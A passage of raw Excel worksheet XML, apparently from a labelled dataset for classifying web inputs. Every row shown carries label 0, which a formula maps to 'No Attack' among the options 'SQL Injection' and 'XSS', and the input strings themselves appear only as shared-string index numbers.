        <v>No Attack</v>
      </c>
    </row>
    <row r="30336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30336" s="1" t="s">
        <v>23534</v>
      </c>
      <c r="B30336">
        <v>0</v>
      </c>
      <c r="C30336" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30337" s="1" t="s">
        <v>27534</v>
      </c>
      <c r="B30337">
        <v>0</v>
      </c>
      <c r="C30337" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30338" s="1" t="s">
        <v>36961</v>
      </c>
      <c r="B30338">
        <v>0</v>
      </c>
      <c r="C30338" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30339" s="1" t="s">
        <v>23865</v>
      </c>
      <c r="B30339">
        <v>0</v>
      </c>
      <c r="C30339" s="7" t="str">
        <f t="shared" ref="C30339:C30402" si="474">IF(B30339=0,"No Attack", IF(B30339=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30340" s="1" t="s">
        <v>22203</v>
      </c>
      <c r="B30340">
        <v>0</v>
      </c>
      <c r="C30340" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30341" s="1" t="s">
        <v>33572</v>
      </c>
      <c r="B30341">
        <v>0</v>
      </c>
      <c r="C30341" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30342" s="1" t="s">
        <v>24041</v>
      </c>
      <c r="B30342">
        <v>0</v>
      </c>
      <c r="C30342" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30343" s="1" t="s">
        <v>36572</v>
      </c>
      <c r="B30343">
        <v>0</v>
      </c>
      <c r="C30343" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30344" s="1" t="s">
        <v>33413</v>
      </c>
      <c r="B30344">
        <v>0</v>
      </c>
      <c r="C30344" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30345" s="1" t="s">
        <v>36676</v>
      </c>
      <c r="B30345">
        <v>0</v>
      </c>
      <c r="C30345" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30346" s="1" t="s">
        <v>27468</v>
      </c>
      <c r="B30346">
        <v>0</v>
      </c>
      <c r="C30346" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30347" s="1" t="s">
        <v>28652</v>
      </c>
      <c r="B30347">
        <v>0</v>
      </c>
      <c r="C30347" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30348" s="1" t="s">
        <v>31904</v>
      </c>
      <c r="B30348">
        <v>0</v>
      </c>
      <c r="C30348" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30349" s="1" t="s">
        <v>31418</v>
      </c>
      <c r="B30349">
        <v>0</v>
      </c>
      <c r="C30349" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30350" s="1" t="s">
        <v>31639</v>
      </c>
      <c r="B30350">
        <v>0</v>
      </c>
      <c r="C30350" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30351" s="1" t="s">
        <v>21519</v>
      </c>
      <c r="B30351">
        <v>0</v>
      </c>
      <c r="C30351" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30352" s="1" t="s">
        <v>33094</v>
      </c>
      <c r="B30352">
        <v>0</v>
      </c>
      <c r="C30352" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30353" s="1" t="s">
        <v>32395</v>
      </c>
      <c r="B30353">
        <v>0</v>
      </c>
      <c r="C30353" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30354" s="1" t="s">
        <v>21215</v>
      </c>
      <c r="B30354">
        <v>0</v>
      </c>
      <c r="C30354" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30355" s="1" t="s">
        <v>20549</v>
      </c>
      <c r="B30355">
        <v>0</v>
      </c>
      <c r="C30355" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30356" s="1" t="s">
        <v>36108</v>
      </c>
      <c r="B30356">
        <v>0</v>
      </c>
      <c r="C30356" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30357" s="1" t="s">
        <v>36266</v>
      </c>
      <c r="B30357">
        <v>0</v>
      </c>
      <c r="C30357" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30358" s="1" t="s">
        <v>24140</v>
      </c>
      <c r="B30358">
        <v>0</v>
      </c>
      <c r="C30358" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30359" s="1" t="s">
        <v>27074</v>
      </c>
      <c r="B30359">
        <v>0</v>
      </c>
      <c r="C30359" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30360" s="1" t="s">
        <v>33008</v>
      </c>
      <c r="B30360">
        <v>0</v>
      </c>
      <c r="C30360" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30361" s="1" t="s">
        <v>33148</v>
      </c>
      <c r="B30361">
        <v>0</v>
      </c>
      <c r="C30361" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30362" s="1" t="s">
        <v>28846</v>
      </c>
      <c r="B30362">
        <v>0</v>
      </c>
      <c r="C30362" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30363" s="1" t="s">
        <v>33790</v>
      </c>
      <c r="B30363">
        <v>0</v>
      </c>
      <c r="C30363" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30364" s="1" t="s">
        <v>20533</v>
      </c>
      <c r="B30364">
        <v>0</v>
      </c>
      <c r="C30364" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30365" s="1" t="s">
        <v>30105</v>
      </c>
      <c r="B30365">
        <v>0</v>
      </c>
      <c r="C30365" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30366" s="1" t="s">
        <v>34181</v>
      </c>
      <c r="B30366">
        <v>0</v>
      </c>
      <c r="C30366" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30367" s="1" t="s">
        <v>30799</v>
      </c>
      <c r="B30367">
        <v>0</v>
      </c>
      <c r="C30367" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30368" s="1" t="s">
        <v>33564</v>
      </c>
      <c r="B30368">
        <v>0</v>
      </c>
      <c r="C30368" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30369" s="1" t="s">
        <v>27406</v>
      </c>
      <c r="B30369">
        <v>0</v>
      </c>
      <c r="C30369" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30370" s="1" t="s">
        <v>20756</v>
      </c>
      <c r="B30370">
        <v>0</v>
      </c>
      <c r="C30370" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30371" s="1" t="s">
        <v>20899</v>
      </c>
      <c r="B30371">
        <v>0</v>
      </c>
      <c r="C30371" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30372" s="1" t="s">
        <v>37400</v>
      </c>
      <c r="B30372">
        <v>0</v>
      </c>
      <c r="C30372" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30373" s="1" t="s">
        <v>24323</v>
      </c>
      <c r="B30373">
        <v>0</v>
      </c>
      <c r="C30373" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30374" s="1" t="s">
        <v>36296</v>
      </c>
      <c r="B30374">
        <v>0</v>
      </c>
      <c r="C30374" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30375" s="1" t="s">
        <v>33060</v>
      </c>
      <c r="B30375">
        <v>0</v>
      </c>
      <c r="C30375" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30376" s="1" t="s">
        <v>28086</v>
      </c>
      <c r="B30376">
        <v>0</v>
      </c>
      <c r="C30376" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30377" s="1" t="s">
        <v>28177</v>
      </c>
      <c r="B30377">
        <v>0</v>
      </c>
      <c r="C30377" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30378" s="1" t="s">
        <v>24045</v>
      </c>
      <c r="B30378">
        <v>0</v>
      </c>
      <c r="C30378" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30379" s="1" t="s">
        <v>35395</v>
      </c>
      <c r="B30379">
        <v>0</v>
      </c>
      <c r="C30379" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30380" s="1" t="s">
        <v>27284</v>
      </c>
      <c r="B30380">
        <v>0</v>
      </c>
      <c r="C30380" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30381" s="1" t="s">
        <v>37027</v>
      </c>
      <c r="B30381">
        <v>0</v>
      </c>
      <c r="C30381" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30382" s="1" t="s">
        <v>21563</v>
      </c>
      <c r="B30382">
        <v>0</v>
      </c>
      <c r="C30382" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30383" s="1" t="s">
        <v>23027</v>
      </c>
      <c r="B30383">
        <v>0</v>
      </c>
      <c r="C30383" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30384" s="1" t="s">
        <v>29386</v>
      </c>
      <c r="B30384">
        <v>0</v>
      </c>
      <c r="C30384" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30385" s="1" t="s">
        <v>22927</v>
      </c>
      <c r="B30385">
        <v>0</v>
      </c>
      <c r="C30385" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30386" s="1" t="s">
        <v>29284</v>
      </c>
      <c r="B30386">
        <v>0</v>
      </c>
      <c r="C30386" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30387" s="1" t="s">
        <v>34299</v>
      </c>
      <c r="B30387">
        <v>0</v>
      </c>
      <c r="C30387" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30388" s="1" t="s">
        <v>29846</v>
      </c>
      <c r="B30388">
        <v>0</v>
      </c>
      <c r="C30388" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30389" s="1" t="s">
        <v>32561</v>
      </c>
      <c r="B30389">
        <v>0</v>
      </c>
      <c r="C30389" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30390" s="1" t="s">
        <v>29969</v>
      </c>
      <c r="B30390">
        <v>0</v>
      </c>
      <c r="C30390" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30391" s="1" t="s">
        <v>34432</v>
      </c>
      <c r="B30391">
        <v>0</v>
      </c>
      <c r="C30391" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30392" s="1" t="s">
        <v>22411</v>
      </c>
      <c r="B30392">
        <v>0</v>
      </c>
      <c r="C30392" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30393" s="1" t="s">
        <v>35470</v>
      </c>
      <c r="B30393">
        <v>0</v>
      </c>
      <c r="C30393" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30394" s="1" t="s">
        <v>29550</v>
      </c>
      <c r="B30394">
        <v>0</v>
      </c>
      <c r="C30394" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30395" s="1" t="s">
        <v>31649</v>
      </c>
      <c r="B30395">
        <v>0</v>
      </c>
      <c r="C30395" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30396" s="1" t="s">
        <v>32236</v>
      </c>
      <c r="B30396">
        <v>0</v>
      </c>
      <c r="C30396" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30397" s="1" t="s">
        <v>28920</v>
      </c>
      <c r="B30397">
        <v>0</v>
      </c>
      <c r="C30397" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30398" s="1" t="s">
        <v>36088</v>
      </c>
      <c r="B30398">
        <v>0</v>
      </c>
      <c r="C30398" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30399" s="1" t="s">
        <v>30109</v>
      </c>
      <c r="B30399">
        <v>0</v>
      </c>
      <c r="C30399" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30400" s="1" t="s">
        <v>21649</v>
      </c>
      <c r="B30400">
        <v>0</v>
      </c>
      <c r="C30400" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30401" s="1" t="s">
        <v>36696</v>
      </c>
      <c r="B30401">
        <v>0</v>
      </c>
      <c r="C30401" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30402" s="1" t="s">
        <v>31398</v>
      </c>
      <c r="B30402">
        <v>0</v>
      </c>
      <c r="C30402" s="7" t="str">
        <f t="shared" si="474"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30403" s="1" t="s">
        <v>20808</v>
      </c>
      <c r="B30403">
        <v>0</v>
      </c>
      <c r="C30403" s="7" t="str">
        <f t="shared" ref="C30403:C30466" si="475">IF(B30403=0,"No Attack", IF(B30403=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30404" s="1" t="s">
        <v>34608</v>
      </c>
      <c r="B30404">
        <v>0</v>
      </c>
      <c r="C30404" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30405" s="1" t="s">
        <v>32730</v>
      </c>
      <c r="B30405">
        <v>0</v>
      </c>
      <c r="C30405" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30406" s="1" t="s">
        <v>34159</v>
      </c>
      <c r="B30406">
        <v>0</v>
      </c>
      <c r="C30406" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30407" s="1" t="s">
        <v>28687</v>
      </c>
      <c r="B30407">
        <v>0</v>
      </c>
      <c r="C30407" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30408" s="1" t="s">
        <v>29280</v>
      </c>
      <c r="B30408">
        <v>0</v>
      </c>
      <c r="C30408" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30409" s="1" t="s">
        <v>32513</v>
      </c>
      <c r="B30409">
        <v>0</v>
      </c>
      <c r="C30409" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30410" s="1" t="s">
        <v>27700</v>
      </c>
      <c r="B30410">
        <v>0</v>
      </c>
      <c r="C30410" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30411" s="1" t="s">
        <v>21472</v>
      </c>
      <c r="B30411">
        <v>0</v>
      </c>
      <c r="C30411" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30412" s="1" t="s">
        <v>28718</v>
      </c>
      <c r="B30412">
        <v>0</v>
      </c>
      <c r="C30412" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30413" s="1" t="s">
        <v>32327</v>
      </c>
      <c r="B30413">
        <v>0</v>
      </c>
      <c r="C30413" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30414" s="1" t="s">
        <v>35859</v>
      </c>
      <c r="B30414">
        <v>0</v>
      </c>
      <c r="C30414" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30415" s="1" t="s">
        <v>24256</v>
      </c>
      <c r="B30415">
        <v>0</v>
      </c>
      <c r="C30415" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30416" s="1" t="s">
        <v>33116</v>
      </c>
      <c r="B30416">
        <v>0</v>
      </c>
      <c r="C30416" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30417" s="1" t="s">
        <v>30200</v>
      </c>
      <c r="B30417">
        <v>0</v>
      </c>
      <c r="C30417" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30418" s="1" t="s">
        <v>29686</v>
      </c>
      <c r="B30418">
        <v>0</v>
      </c>
      <c r="C30418" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30419" s="1" t="s">
        <v>27518</v>
      </c>
      <c r="B30419">
        <v>0</v>
      </c>
      <c r="C30419" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30420" s="1" t="s">
        <v>35854</v>
      </c>
      <c r="B30420">
        <v>0</v>
      </c>
      <c r="C30420" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30421" s="1" t="s">
        <v>23109</v>
      </c>
      <c r="B30421">
        <v>0</v>
      </c>
      <c r="C30421" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30422" s="1" t="s">
        <v>31211</v>
      </c>
      <c r="B30422">
        <v>0</v>
      </c>
      <c r="C30422" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30423" s="1" t="s">
        <v>22671</v>
      </c>
      <c r="B30423">
        <v>0</v>
      </c>
      <c r="C30423" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30424" s="1" t="s">
        <v>21073</v>
      </c>
      <c r="B30424">
        <v>0</v>
      </c>
      <c r="C30424" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30425" s="1" t="s">
        <v>30087</v>
      </c>
      <c r="B30425">
        <v>0</v>
      </c>
      <c r="C30425" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30426" s="1" t="s">
        <v>31646</v>
      </c>
      <c r="B30426">
        <v>0</v>
      </c>
      <c r="C30426" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30427" s="1" t="s">
        <v>33918</v>
      </c>
      <c r="B30427">
        <v>0</v>
      </c>
      <c r="C30427" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30428" s="1" t="s">
        <v>33110</v>
      </c>
      <c r="B30428">
        <v>0</v>
      </c>
      <c r="C30428" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30429" s="1" t="s">
        <v>29925</v>
      </c>
      <c r="B30429">
        <v>0</v>
      </c>
      <c r="C30429" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30430" s="1" t="s">
        <v>35011</v>
      </c>
      <c r="B30430">
        <v>0</v>
      </c>
      <c r="C30430" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30431" s="1" t="s">
        <v>20913</v>
      </c>
      <c r="B30431">
        <v>0</v>
      </c>
      <c r="C30431" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30432" s="1" t="s">
        <v>26990</v>
      </c>
      <c r="B30432">
        <v>0</v>
      </c>
      <c r="C30432" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30433" s="1" t="s">
        <v>24221</v>
      </c>
      <c r="B30433">
        <v>0</v>
      </c>
      <c r="C30433" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30434" s="1" t="s">
        <v>33218</v>
      </c>
      <c r="B30434">
        <v>0</v>
      </c>
      <c r="C30434" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30435" s="1" t="s">
        <v>32653</v>
      </c>
      <c r="B30435">
        <v>0</v>
      </c>
      <c r="C30435" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30436" s="1" t="s">
        <v>22350</v>
      </c>
      <c r="B30436">
        <v>0</v>
      </c>
      <c r="C30436" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30437" s="1" t="s">
        <v>22059</v>
      </c>
      <c r="B30437">
        <v>0</v>
      </c>
      <c r="C30437" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30438" s="1" t="s">
        <v>27789</v>
      </c>
      <c r="B30438">
        <v>0</v>
      </c>
      <c r="C30438" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30439" s="1" t="s">
        <v>32693</v>
      </c>
      <c r="B30439">
        <v>0</v>
      </c>
      <c r="C30439" s="7" t="str">
        <f t="shared" si="475"/>
        <v>No Attack</v>
      </c>
    </row>
